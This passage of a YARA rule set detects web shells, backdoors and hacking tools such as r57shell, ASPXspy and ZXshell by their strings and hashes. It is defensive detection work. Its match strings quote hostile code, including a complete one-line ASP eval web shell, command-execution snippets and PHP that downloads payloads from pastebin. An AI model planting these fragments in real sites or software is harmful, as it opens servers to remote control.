"63d9fd24fa4d22a41fc5522fc7050f9f" strings: $s7 = "theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\")" $s8 = "scrollbar-darkshadow-color:#9C9CD3;" $s9 = "scrollbar-face-color:#E4E4F3;" condition: all of them } rule _root_040_zip_Folder_deploy { meta: description = "Webshells Auto-generated - file deploy.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "2c9f9c58999256c73a5ebdb10a9be269" strings: $s5 = "halon synscan 1-65536" $s8 = "Obviously you replace the ip address with that of the target." condition: all of them } rule by063cli { meta: description = "Webshells Auto-generated - file by063cli.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "49ce26eb97fd13b6d92a5e5d169db859" strings: $s2 = "#popmsghello,are you all right?" $s4 = "connect failed,check your network and remote ip." condition: all of them } rule icyfox007v1_10_rar_Folder_asp { meta: description = "Webshells Auto-generated - file asp.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "2c412400b146b7b98d6e7755f7159bb9" strings: $s0 = "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>" condition: all of them } rule FSO_s_EFSO_2_2 { meta: description = "Webshells Auto-generated - file EFSO_2.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "a341270f9ebd01320a7490c12cb2e64c" strings: $s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV" $s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j" condition: all of them } rule byshell063_ntboot_2 { meta: description = "Webshells Auto-generated - file ntboot.dll" author = "Yara Bulk Rule Generator by Florian Roth" hash = "cb9eb5a6ff327f4d6c46aacbbe9dda9d" strings: $s6 = "OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)" condition: all of them } rule u_uay { meta: description = "Webshells Auto-generated - file uay.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "abbc7b31a24475e4c5d82fc4c2b8c7c4" strings: $s1 = "exec \"c:\\WINDOWS\\System32\\freecell.exe" $s9 = "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security" condition: 1 of them } rule bin_wuaus { meta: description = "Webshells Auto-generated - file wuaus.dll" author = "Yara Bulk Rule Generator by Florian Roth" hash = "46a365992bec7377b48a2263c49e4e7d" strings: $s1 = "9(90989@9V9^9f9n9v9" $s2 = ":(:,:0:4:8:C:H:N:T:Y:_:e:o:y:" $s3 = ";(=@=G=O=T=X=\\=" $s4 = "TCP Send Error!!" $s5 = "1\"1;1X1^1e1m1w1~1" $s8 = "=$=)=/=<=Y=_=j=p=z=" condition: all of them } rule pwreveal { meta: description = "Webshells Auto-generated - file pwreveal.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "b4e8447826a45b76ca45ba151a97ad50" strings: $s0 = "*<Blank - no es" $s3 = "JDiamondCS " $s8 = "sword set> [Leith=0 bytes]" $s9 = "ION\\System\\Floating-" condition: all of them } rule shelltools_g0t_root_xwhois { meta: description = "Webshells Auto-generated - file xwhois.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "0bc98bd576c80d921a3460f8be8816b4" strings: $s1 = "rting! " $s2 = "aTypCog(" $s5 = "Diamond" $s6 = "r)r=rQreryr" condition: all of them } rule vanquish_2 { meta: description = "Webshells Auto-generated - file vanquish.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "2dcb9055785a2ee01567f52b5a62b071" strings: $s2 = "Vanquish - DLL injection failed:" condition: all of them } rule down_rar_Folder_down { meta: description = "Webshells Auto-generated - file down.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "db47d7a12b3584a2e340567178886e71" strings: $s0 = "response.write \"<font color=blue size=2>NetBios Name: \\\\\" & Snet.ComputerName &" condition: all of them } rule cmdShell { meta: description = "Webshells Auto-generated - file cmdShell.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "8a9fef43209b5d2d4b81dfbb45182036" strings: $s1 = "if cmdPath=\"wscriptShell\" then" condition: all of them } rule ZXshell2_0_rar_Folder_nc { meta: description = "Webshells Auto-generated - file nc.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "2cd1bf15ae84c5f6917ddb128827ae8b" strings: $s0 = "WSOCK32.dll" $s1 = "?bSUNKNOWNV" $s7 = "p@gram Jm6h)" $s8 = "ser32.dllCONFP@" condition: all of them } rule portlessinst { meta: description = "Webshells Auto-generated - file portlessinst.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "74213856fc61475443a91cd84e2a6c2f" strings: $s2 = "Fail To Open Registry" $s3 = "f<-WLEggDr\"" $s6 = "oMemoryCreateP" condition: all of them } rule SetupBDoor { meta: description = "Webshells Auto-generated - file SetupBDoor.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "41f89e20398368e742eda4a3b45716b6" strings: $s1 = "\\BDoor\\SetupBDoor" condition: all of them } rule phpshell_3 { meta: description = "Webshells Auto-generated - file phpshell.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "e8693a2d4a2ffea4df03bb678df3dc6d" strings: $s3 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>" $s5 = " echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";" condition: all of them } rule BIN_Server { meta: description = "Webshells Auto-generated - file Server.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "1d5aa9cbf1429bb5b8bf600335916dcd" strings: $s0 = "configserver" $s1 = "GetLogicalDrives" $s2 = "WinExec" $s4 = "fxftest" $s5 = "upfileok" $s7 = "upfileer" condition: all of them } rule HYTop2006_rar_Folder_2006 { meta: description = "Webshells Auto-generated - file 2006.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "c19d6f4e069188f19b08fa94d44bc283" strings: $s6 = "strBackDoor = strBackDoor " condition: all of them } rule r57shell_3 { meta: description = "Webshells Auto-generated - file r57shell.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "87995a49f275b6b75abe2521e03ac2c0" strings: $s1 = "<b>\".$_POST['cmd']" condition: all of them } rule HDConfig { meta: description = "Webshells Auto-generated - file HDConfig.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "7d60e552fdca57642fd30462416347bd" strings: $s0 = "An encryption key is derived from the password hash. " $s3 = "A hash object has been created. " $s4 = "Error during CryptCreateHash!" $s5 = "A new key container has been created." $s6 = "The password has been added to the hash. " condition: all of them } rule FSO_s_ajan_2 { meta: description = "Webshells Auto-generated - file ajan.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "22194f8c44524f80254e1b5aec67b03e" strings: $s2 = "\"Set WshShell = CreateObject(\"\"WScript.Shell\"\")" $s3 = "/file.zip" condition: all of them } rule Webshell_and_Exploit_CN_APT_HK : Webshell { meta: author = "Florian Roth" description = "Webshell and Exploit Code in relation with APT against Honk Kong protesters" date = "10.10.2014" score = 50 strings: $a0 = "<script language=javascript src=http://java-se.com/o.js</script>" fullword $s0 = "<span style=\"font:11px Verdana;\">Password: </span><input name=\"password\" type=\"password\" size=\"20\">" $s1 = "<input type=\"hidden\" name=\"doing\" value=\"login\">" condition: $a0 or ( all of ($s*) ) } rule JSP_Browser_APT_webshell { meta: description = "VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a" author = "F.Roth" date = "10.10.2014" score = 60 strings: $a1a = "private static final String[] COMMAND_INTERPRETER = {\"" ascii $a1b = "cmd\", \"/C\"}; // Dos,Windows" ascii $a2 = "Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));" ascii $a3 = "ret.append(\"!!!! Process has timed out, destroyed !!!!!\");" ascii condition: all of them } rule JSP_jfigueiredo_APT_webshell { meta: description = "JSP Browser used as web shell by APT groups - author: jfigueiredo" author = "F.Roth" date = "12.10.2014" score = 60 reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/Browser.jsp" strings: $a1 = "String fhidden = new String(Base64.encodeBase64(path.getBytes()));" ascii $a2 = "<form id=\"upload\" name=\"upload\" action=\"ServFMUpload\" method=\"POST\" enctype=\"multipart/form-data\">" ascii condition: all of them } rule JSP_jfigueiredo_APT_webshell_2 { meta: description = "JSP Browser used as web shell by APT groups - author: jfigueiredo" author = "F.Roth" date = "12.10.2014" score = 60 reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/" strings: $a1 = "<div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>" ascii $a2 = "$(\"#dialog\").dialog(\"destroy\");" ascii $s1 = "<form id=\"form\" action=\"ServFMUpload\" method=\"post\" enctype=\"multipart/form-data\">" ascii $s2 = "<input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"L3BkZi8=\" />" ascii condition: all of ($a*) or all of ($s*) } rule AJAX_FileUpload_webshell { meta: description = "AJAX JS/CSS components providing web shell by APT groups" author = "F.Roth" date = "12.10.2014" score = 75 reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/ajaxfileupload.js" strings: $a1 = "var frameId = 'jUploadFrame' + id;" ascii $a2 = "var form = jQuery('<form action=\"\" method=\"POST\" name=\"' + formId + '\" id=\"' + formId + '\" enctype=\"multipart/form-data\"></form>');" ascii $a3 = "jQuery(\"<div>\").html(data).evalScripts();" ascii condition: all of them } rule Webshell_Insomnia { meta: description = "Insomnia Webshell - file InsomniaShell.aspx" author = "Florian Roth" reference = "http://www.darknet.org.uk/2014/12/insomniashell-asp-net-reverse-shell-bind-shell/" date = "2014/12/09" hash = "e0cfb2ffaa1491aeaf7d3b4ee840f72d42919d22" score = 80 strings: $s0 = "Response.Write(\"- Failed to create named pipe:\");" fullword ascii $s1 = "Response.Output.Write(\"+ Sending {0}<br>\", command);" fullword ascii $s2 = "String command = \"exec master..xp_cmdshell 'dir > \\\\\\\\" ascii $s3 = "Response.Write(\"- Error Getting User Info<br>\");" fullword ascii $s4 = "string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes," fullword ascii $s5 = "[DllImport(\"Advapi32.dll\", SetLastError = true)]" fullword ascii $s9 = "username = DumpAccountSid(tokUser.User.Sid);" fullword ascii $s14 = "//Response.Output.Write(\"Opened process PID: {0} : {1}<br>\", p" ascii condition: 3 of them } rule HawkEye_PHP_Panel { meta: description = "Detects HawkEye Keyloggers PHP Panel" author = "Florian Roth" date = "2014/12/14" score = 60 strings: $s0 = "$fname = $_GET['fname'];" ascii fullword $s1 = "$data = $_GET['data'];" ascii fullword $s2 = "unlink($fname);" ascii fullword $s3 = "echo \"Success\";" fullword ascii condition: all of ($s*) and filesize < 600 } rule SoakSoak_Infected_Wordpress { meta: description = "Detects a SoakSoak infected Wordpress site http://goo.gl/1GzWUX" reference = "http://goo.gl/1GzWUX" author = "Florian Roth" date = "2014/12/15" score = 60 strings: $s0 = "wp_enqueue_script(\"swfobject\");" ascii fullword $s1 = "function FuncQueueObject()" ascii fullword $s2 = "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');" ascii fullword condition: all of ($s*) } rule Pastebin_Webshell { meta: description = "Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs" author = "Florian Roth" score = 70 date = "13.01.2015" reference = "http://goo.gl/7dbyZs" strings: $s0 = "file_get_contents(\"http://pastebin.com" ascii $s1 = "xcurl('http://pastebin.com/download.php" ascii $s2 = "xcurl('http://pastebin.com/raw.php" ascii $x0 = "if($content){unlink('evex.php');" ascii $x1 = "$fh2 = fopen(\"evex.php\", 'a');" ascii $y0 = "file_put_contents($pth" ascii $y1 = "echo \"<login_ok>" ascii $y2 = "str_replace('* @package Wordpress',$temp" ascii condition: 1 of ($s*) or all of ($x*) or all of ($y*) } rule ASPXspy2 { meta: description = "Web shell - file ASPXspy2.aspx" author = "Florian Roth" reference = "not set" date = "2015/01/24" hash = "5642387d92139bfe9ae11bfef6bfe0081dcea197" strings: $s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=\\r\\n-PortNo=52521\\r\\n-User=bin" ascii $s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii $s3 = "Process[] p=Process.GetProcesses();" fullword ascii $s4 = "Response.Cookies.Add(new HttpCookie(vbhLn,Password));" fullword ascii $s5 = "[DllImport(\"kernel32.dll\",EntryPoint=\"GetDriveTypeA\")]" fullword ascii $s6 = "<p>ConnString : <asp:TextBox id=\"MasR\" style=\"width:70%;margin:0 8px;\" CssCl" ascii $s7 = "ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();" fullword ascii $s8 = "Copyright © 2009 Bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_bla" ascii $s10 = "Response.AddHeader(\"Content-Disposition\",\"attachment;filename=\"+HttpUtility." ascii $s11 = "nxeDR.Command+=new CommandEventHandler(this.iVk);" fullword ascii $s12 = "<%@ import Namespace=\"System.ServiceProcess\"%>" fullword ascii $s13 = "foreach(string innerSubKey in sk.GetSubKeyNames())" fullword ascii $s17 = "Response.Redirect(\"http://www.rootkit.net.cn\");" fullword ascii $s20 = "else if(Reg_Path.StartsWith(\"HKEY_USERS\"))" fullword ascii condition: 6 of them }